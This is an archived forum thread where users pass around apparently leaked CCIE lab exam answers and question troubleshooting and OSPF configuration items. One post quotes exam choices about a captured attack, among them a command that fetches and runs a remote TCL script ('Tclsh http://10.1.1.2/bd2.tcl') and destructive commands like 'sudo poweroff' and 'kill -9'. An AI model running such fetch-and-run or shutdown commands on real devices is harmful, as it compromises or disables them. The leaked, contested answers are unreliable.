View Full Version : One guy passed TS1, DIAG H3, CFG H3
CiscoCCDE
05-12-2018, 03:19 PM
I want to share his feedback for you guys.
**Hidden Content: Check the thread to see hidden data.**
fishlike
05-12-2018, 04:17 PM
thanks for sharing
cciestudy2018
05-12-2018, 04:42 PM
Hi ,
thanks for feedback. I have just 2 questions:
2) What command can disrupt the box:
Filter tcp.stream eq 4 OR tcp.stream eq 2 can not work in exam
OR filter tcp.port==3001, flow tcp stream, you cand find command "Sudo poweroff"
- :P
- @
- Sharkfest;
- Kill;
- Sudo poweroff; -----> HERE
- Kill -9 &;
Still, unclear how have you solved? Following stream stream? or just chosed sudo poweroff?
3)Identify the command Attacker use. Remember: tclsh http:///b2d.tcl
- Copy http://10.1.1.1/bd2.tcl ;
- Tclsh http://10.1.1.1/bd2.tcl ;
- Tclsh http://10.1.1.2/bd2.tcl; -----> HERE
- http://10.1.1.1/bd2.tcl ;
- http://10.1.1.2/bd2.tcl
Could you explain, reason to choosing this option? Because 10.1.1.2 is victim ,yes? But it does not have http server. Attacker which is 10.1.1.1 has http server enabled on it.
regards,
ccierscisco
05-12-2018, 07:20 PM
can you share H3 soln ?
freebsd321
06-11-2018, 05:15 AM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
Thanks for your feedback.
hainhtet
06-16-2018, 03:02 PM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
Thanks for your feedback.
zr595576323
06-17-2018, 03:13 PM
thanks for sharing
mistyccie
08-28-2018, 01:18 PM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
mistyccie
08-28-2018, 01:19 PM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
Thanks
nekonesto12
08-29-2018, 03:26 PM
Thanks for sharing
mudassair
08-29-2018, 03:38 PM
Hi ,
thanks for feedback. I have just 2 questions:
Still, unclear how have you solved? Following stream stream? or just chosed sudo poweroff?
Could you explain, reason to choosing this option? Because 10.1.1.2 is victim ,yes? But it does not have http server. Attacker which is 10.1.1.1 has http server enabled on it.
regards,
Thanks for your feedback.
Thanks
ccierscisco
11-07-2018, 07:22 PM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
thanks
zedlennon
11-21-2018, 03:06 PM
Hi,
--- Section 2.2: OSPF in DC#1 --> OSPF has been configured in all device.
But need to add lo123 in R14 and R15 to ospf
Can anyone explain why do you need to advertise Loopback 123 on R14 and R15 into DC OSPF? According to the loopbacks 123 on R24 and R25, that should be a /28 subnet which would break the restriction in section 2.2.
"Host loopbacks are the only OSPF intra-area prefixes that may appear in any DC devices’ routing table"
Is this a specific requirement on the exam? If so, then the redistribution would make them external instead of intra-area.
Thanks.
beece2003
11-22-2018, 02:57 AM
Hi, can anyone post configuration for section 3.4 L2LIPSec
zureta232
12-23-2018, 01:47 PM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
Thank you for sharing!
azeem
12-23-2018, 04:24 PM
I want to share his feedback for you guys.
***Hidden content cannot be quoted.***
johnspain
01-05-2019, 12:56 PM
maybe is is an errata and lo123 should be advertised into bgp ??
ernesto.patente2018
03-13-2019, 10:26 AM
thank you very much
Powered by IECollection; Copyright IECollection, Inc. All rights reserved.